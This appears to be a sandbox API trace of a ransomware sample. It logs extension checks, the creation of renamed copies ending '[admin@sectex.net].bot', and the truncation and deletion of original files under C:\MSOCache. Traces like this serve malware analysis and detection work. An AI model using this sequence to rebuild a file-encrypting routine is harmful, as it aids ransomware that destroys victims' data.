	[0047.725] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.725] lstrlenW (lpString=".dbf") returned 4
	[0047.725] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0047.725] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.725] lstrlenW (lpString=".1cd") returned 4
	[0047.725] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0047.725] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.725] lstrlenW (lpString=".jpg") returned 4
	[0047.725] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0047.725] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0047.725] lstrlenW (lpString="ose.exe") returned 7
	[0047.725] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.226] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=174440) returned 1
	[0048.226] CloseHandle (hObject=0x1a8) returned 1
	[0048.226] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020
	[0048.226] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.226] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.227] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.227] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.227] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.227] GetLastError () returned 0x0
	[0048.227] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x2a968, lpOverlapped=0x0) returned 1
	[0048.231] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x2a970, lpOverlapped=0x0) returned 1
	[0048.235] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.235] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0048.235] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.235] CloseHandle (hObject=0x1d0) returned 1
	[0048.235] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.235] SetEndOfFile (hFile=0x1a8) returned 1
	[0048.237] CloseHandle (hObject=0x1a8) returned 1
	[0048.237] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0048.237] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1
	[0048.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.238] lstrlenW (lpString=".doc") returned 4
	[0048.238] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0048.238] lstrlenW (lpString=".docx") returned 5
	[0048.238] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0048.238] lstrlenW (lpString=".pdf") returned 4
	[0048.238] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0048.238] lstrlenW (lpString=".xls") returned 4
	[0048.238] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0048.238] lstrlenW (lpString=".xlsx") returned 5
	[0048.238] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0048.238] lstrlenW (lpString=".ppt") returned 4
	[0048.238] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0048.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.238] lstrlenW (lpString=".zip") returned 4
	[0048.238] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0048.238] lstrlenW (lpString=".rar") returned 4
	[0048.238] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0048.238] lstrlenW (lpString=".bz2") returned 4
	[0048.238] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0048.238] lstrlenW (lpString=".7z") returned 3
	[0048.238] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0048.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.238] lstrlenW (lpString=".dbf") returned 4
	[0048.238] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0048.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.238] lstrlenW (lpString=".1cd") returned 4
	[0048.238] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0048.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.238] lstrlenW (lpString=".jpg") returned 4
	[0048.238] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0048.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.239] lstrlenW (lpString=".doc") returned 4
	[0048.239] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0048.239] lstrlenW (lpString=".docx") returned 5
	[0048.239] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0048.239] lstrlenW (lpString=".pdf") returned 4
	[0048.239] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0048.239] lstrlenW (lpString=".xls") returned 4
	[0048.239] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0048.239] lstrlenW (lpString=".xlsx") returned 5
	[0048.239] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0048.239] lstrlenW (lpString=".ppt") returned 4
	[0048.239] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0048.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.239] lstrlenW (lpString=".zip") returned 4
	[0048.239] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0048.239] lstrlenW (lpString=".rar") returned 4
	[0048.239] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0048.239] lstrlenW (lpString=".bz2") returned 4
	[0048.239] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0048.239] lstrlenW (lpString=".7z") returned 3
	[0048.239] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0048.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.239] lstrlenW (lpString=".dbf") returned 4
	[0048.239] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0048.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.239] lstrlenW (lpString=".1cd") returned 4
	[0048.239] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0048.239] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0048.239] lstrlenW (lpString=".jpg") returned 4
	[0048.239] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0048.240] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0048.240] lstrlenW (lpString="PidGenX.dll") returned 11
	[0048.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.240] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=1463568) returned 1
	[0048.240] CloseHandle (hObject=0x1a8) returned 1
	[0048.240] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020
	[0048.240] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.240] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.240] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.241] GetLastError () returned 0x0
	[0048.241] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0048.265] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0048.449] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x65520, lpOverlapped=0x0) returned 1
	[0048.464] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x65530, lpOverlapped=0x0) returned 1
	[0048.474] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.474] WriteFile (in: hFile=0x1d0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0048.474] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.474] CloseHandle (hObject=0x1d0) returned 1
	[0048.475] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.475] SetEndOfFile (hFile=0x1a8) returned 1
	[0048.930] CloseHandle (hObject=0x1a8) returned 1
	[0048.931] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0048.975] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.976] lstrlenW (lpString=".doc") returned 4
	[0048.976] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString=".docx") returned 5
	[0048.976] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1
	[0048.976] lstrlenW (lpString=".pdf") returned 4
	[0048.976] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString=".xls") returned 4
	[0048.976] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString=".xlsx") returned 5
	[0048.976] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1
	[0048.976] lstrlenW (lpString=".ppt") returned 4
	[0048.976] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.976] lstrlenW (lpString=".zip") returned 4
	[0048.976] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString=".rar") returned 4
	[0048.976] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString=".bz2") returned 4
	[0048.976] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0048.976] lstrlenW (lpString=".7z") returned 3
	[0048.976] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.976] lstrlenW (lpString=".dbf") returned 4
	[0048.976] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.976] lstrlenW (lpString=".1cd") returned 4
	[0048.976] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.976] lstrlenW (lpString=".jpg") returned 4
	[0048.976] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0048.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.977] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.977] lstrlenW (lpString=".doc") returned 4
	[0048.977] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0048.977] lstrlenW (lpString=".docx") returned 5
	[0048.977] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1
	[0048.977] lstrlenW (lpString=".pdf") returned 4
	[0048.977] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0048.977] lstrlenW (lpString=".xls") returned 4
	[0048.977] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0048.977] lstrlenW (lpString=".xlsx") returned 5
	[0048.977] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1
	[0048.977] lstrlenW (lpString=".ppt") returned 4
	[0048.977] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0048.977] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.977] lstrlenW (lpString=".zip") returned 4
	[0048.977] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0048.977] lstrlenW (lpString=".rar") returned 4
	[0048.977] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0048.977] lstrlenW (lpString=".bz2") returned 4
	[0048.977] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0048.977] lstrlenW (lpString=".7z") returned 3
	[0048.977] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0048.977] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.977] lstrlenW (lpString=".dbf") returned 4
	[0048.977] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0048.977] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.977] lstrlenW (lpString=".1cd") returned 4
	[0048.977] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0048.977] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0048.977] lstrlenW (lpString=".jpg") returned 4
	[0048.977] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0048.978] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0048.978] lstrlenW (lpString="setup.exe") returned 9
	[0048.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.978] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=1377656) returned 1
	[0048.978] CloseHandle (hObject=0x1a8) returned 1
	[0048.978] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020
	[0048.978] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.978] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.978] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.979] GetLastError () returned 0x0
	[0048.979] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0049.112] WriteFile (in: hFile=0x184, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0049.131] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x50588, lpOverlapped=0x0) returned 1
	[0049.225] WriteFile (in: hFile=0x184, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x50590, lpOverlapped=0x0) returned 1
	[0049.489] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0049.493] WriteFile (in: hFile=0x184, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0049.497] SetEndOfFile (hFile=0x184) returned 1
	[0049.502] CloseHandle (hObject=0x184) returned 1
	[0049.509] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0049.512] SetEndOfFile (hFile=0x1a8) returned 1
	[0049.598] CloseHandle (hObject=0x1a8) returned 1
	[0049.601] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0049.611] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1
	[0049.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.613] lstrlenW (lpString=".doc") returned 4
	[0049.613] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0049.613] lstrlenW (lpString=".docx") returned 5
	[0049.613] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1
	[0049.613] lstrlenW (lpString=".pdf") returned 4
	[0049.613] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString=".xls") returned 4
	[0049.614] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString=".xlsx") returned 5
	[0049.614] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1
	[0049.614] lstrlenW (lpString=".ppt") returned 4
	[0049.614] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.614] lstrlenW (lpString=".zip") returned 4
	[0049.614] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString=".rar") returned 4
	[0049.614] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0049.614] lstrlenW (lpString=".bz2") returned 4
	[0049.614] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0049.614] lstrlenW (lpString=".7z") returned 3
	[0049.614] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0049.614] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.614] lstrlenW (lpString=".dbf") returned 4
	[0049.614] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0049.614] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72
	[0049.614] lstrlenW (lpString=".1cd") returned 4
	[0049.614] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
